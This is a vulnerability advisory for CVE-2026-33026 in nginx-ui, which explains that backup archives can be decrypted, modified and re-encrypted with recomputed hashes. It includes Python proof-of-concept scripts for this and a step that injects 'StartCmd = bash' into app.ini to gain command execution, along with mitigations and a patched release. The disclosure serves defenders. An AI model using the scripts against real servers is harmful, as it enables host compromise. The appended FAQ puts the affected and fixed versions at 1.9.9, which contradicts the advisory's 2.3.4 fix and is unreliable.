CVE-2026-33026: nginx-ui Backup Restore Allows Tampering with Encrypted Backups
Summary The nginx-ui backup restore mechanism allows attackers to tamper with encrypted backup archives and inject malicious configuration during restoration.
Details The backup format lacks a trusted integrity root. Although files are encrypted, the encryption key and IV are provided to the client and the integrity metadata (hashinfo.txt) is encrypted using the same key. As a result, an attacker who can access the backup token can decrypt the archive, modify its contents, recompute integrity hashes, and re-encrypt the bundle.
Because the restore process does not enforce integrity verification and accepts backups even when hash mismatches are detected, the system restores attacker-controlled configuration even when integrity verification warnings are raised. In certain configurations this may lead to arbitrary command execution on the host.
The backup system is built around the following workflow:
1. Backup files are compressed into nginx-ui.zip and nginx.zip. 2. The files are encrypted using AES-256-CBC. 3. SHA-256 hashes of the encrypted files are stored in hashinfo.txt. 4. The hash file is also encrypted with the same AES key and IV. 5. The AES key and IV are provided to the client as a "backup security token".
This architecture creates a circular trust model:
- The encryption key is available to the client. - The integrity metadata is encrypted with that same key. - The restore process trusts hashes contained within the backup itself.
Because the attacker can decrypt and re-encrypt all files using the provided token, they can also recompute valid hashes for any modified content.
Environment - OS: Kali Linux 6.17.10-1kali1 (6.17.10+kali-amd64) - Application Version: nginx-ui v2.3.3 (513) e5da6dd (go1.26.0) - Deployment: Docker Container default installation - Relevant Source Files: - backupcrypto.go - backup.go - restore.go - SystemRestoreContent.vue
PoC 1. Generate a backup and extract the security token (Key and IV) from the HTTP response headers or the .key file. <img width="1483" height="586" alt="image" src="https://github.com/user-attachments/assets/857a1b3f-ce66-4929-a165-2f28393df17f" />
2. Decrypt the nginx-ui.zip archive using the obtained token. import base64 import os import sys import zipfile from io import BytesIO from Crypto.Cipher import AES from Crypto.Util.Padding import unpad
def decryptaescbc(encrypteddata: bytes, keyb64: str, ivb64: str) -> bytes: key = base64.b64decode(keyb64) iv = base64.b64decode(ivb64) cipher = AES.new(key, AES.MODECBC, iv) decrypted = cipher.decrypt(encrypteddata) return unpad(decrypted, AES.blocksize)
def processlocalbackup(filepath, token, outputdir): keyb64, ivb64 = token.split(":") os.makedirs(outputdir, existok=True) print(f"[] File processing: {filepath}") with zipfile.ZipFile(filepath, 'r') as mainzip: mainzip.extractall(outputdir) filestodecrypt = ["hashinfo.txt", "nginx-ui.zip", "nginx.zip"] for filename in filestodecrypt: path = os.path.join(outputdir, filename) if os.path.exists(path): with open(path, "rb") as f: encrypted = f.read() decrypted = decryptaescbc(encrypted, keyb64, ivb64) outpath = path + ".decrypted" with open(outpath, "wb") as f: f.write(decrypted) print(f"[] Successfully decrypted: {outpath}")
Manual config BACKUPFILE = "backup-20260314-151959.zip" TOKEN = "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx" OUTPUT = "decrypted"
if name == "main": processlocalbackup(BACKUPFILE, TOKEN, OUTPUT)
3. Modify the contained app.ini to inject malicious configuration (e.g., StartCmd = bash). 4. Re-compress the files and calculate the new SHA-256 hash. 5. Update hashinfo.txt with the new, legitimate-looking hashes for the modified files. 6. Encrypt the bundle again using the original Key and IV. import base64 import hashlib import os import zipfile from Crypto.Cipher import AES from Crypto.Util.Padding import pad
def encryptfile(data, keyb64, ivb64): key = base64.b64decode(keyb64) iv = base64.b64decode(ivb64) cipher = AES.new(key, AES.MODECBC, iv) return cipher.encrypt(pad(data, AES.blocksize))
def buildrebuiltbackup(files, token, outputfilename="backuprebuild.zip"): keyb64, ivb64 = token.split(":") encryptedblobs = {} for fname in files: with open(fname, "rb") as f: data = f.read() blob = encryptfile(data, keyb64, ivb64)
targetname = fname.replace(".decrypted", "") encryptedblobs[targetname] = blob print(f"[] Cipher {targetname}: {len(blob)} bytes")
hashcontent = "" for name, blob in encryptedblobs.items(): h = hashlib.sha256(blob).hexdigest() hashcontent += f"{name}: {h}\n" encryptedhashinfo = encryptfile(hashcontent.encode(), keyb64, ivb64) encryptedblobs["hashinfo.txt"] = encryptedhashinfo
with zipfile.ZipFile(outputfilename, 'w', compression=zipfile.ZIPDEFLATED) as zf: for name, blob in encryptedblobs.items(): zf.writestr(name, blob) print(f"\n[] Backup rebuild: {outputfilename}") print(f"[] Verificando integridad...")
TOKEN = "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx" FILES = ["nginx-ui.zip.decrypted", "nginx.zip.decrypted"]
if name == "main": buildrebuiltbackup(FILES, TOKEN) 7. Upload the tampered backup to the nginx-ui restore interface. <img width="1059" height="290" alt="image" src="https://github.com/user-attachments/assets/66872685-b85b-4c81-ae24-13c811acba9a" />
8. Observation: The system accepts the modified backup. Although a warning may appear, the restoration proceeds and the malicious configuration is applied, granting the attacker arbitrary command execution on the host. <img width="1316" height="627" alt="image" src="https://github.com/user-attachments/assets/2752749e-ac39-4d60-88ca-5058b8e840a6" />
Impact An attacker capable of uploading or supplying a malicious backup can modify application configuration and internal state during restoration.
Potential impacts include:
- Persistent configuration tampering - Backdoor insertion into nginx configuration - Execution of attacker-controlled commands depending on configuration settings - Full compromise of the nginx-ui instance
The severity depends on the restore permissions and deployment configuration.
Recommended Mitigation
1. Introduce a trusted integrity root Integrity metadata must not be derived solely from data contained in the backup. Possible solutions include: - Signing backup metadata using a server-side private key - Storing integrity metadata separately from the backup archive
2. Enforce integrity verification The restore operation must abort if hash verification fails.
3. Avoid circular trust models If encryption keys are distributed to clients, the backup must not rely on attacker-controlled metadata for integrity validation.
4. Optional cryptographic improvements While not sufficient alone, switching to an authenticated encryption scheme such as AES-GCM can simplify integrity protection if the encryption keys remain secret.
This vulnerability arises from a circular trust model where integrity metadata is protected using the same key that is provided to the client, allowing attackers to recompute valid integrity data after modifying the archive.
Regression
The previously reported vulnerability (GHSA-g9w5-qffc-6762) addressed unauthorized access to backup files but did not resolve the underlying cryptographic design issue.
The backup format still allows attacker-controlled modification of encrypted backup contents because integrity metadata is protected using the same key distributed to clients.
As a result, the fundamental integrity weakness remains exploitable even after the previous fix.
A patched version is available at https://github.com/0xJacky/nginx-ui/releases/tag/v2.3.4.
Other sources
Nginx UI is a web user interface for the Nginx web server. Prior to version 2.3.4, the nginx-ui backup restore mechanism allows attackers to tamper with encrypted backup archives and inject malicious configuration during restoration. This issue has been patched in version 2.3.4.
— MITRE
Affected Software
Event History
Frequently Asked Questions
What is the severity of CVE-2026-33026?
The severity of CVE-2026-33026 is classified as high due to the potential for attackers to inject malicious configurations.
How do I fix CVE-2026-33026?
To fix CVE-2026-33026, users should upgrade to a version of nginx-ui that is greater than 1.9.9 to mitigate the risk of tampered backup archives.
What systems are affected by CVE-2026-33026?
CVE-2026-33026 affects the `nginx-ui` versions up to and including 1.9.9.
What kind of attack is possible with CVE-2026-33026?
CVE-2026-33026 allows attackers to manipulate encrypted backup archives and potentially execute malicious configurations upon restoration.
Is encryption enough to protect against CVE-2026-33026?
No, because CVE-2026-33026 highlights that the lack of a trusted integrity root makes the encryption insufficient for protecting backup files.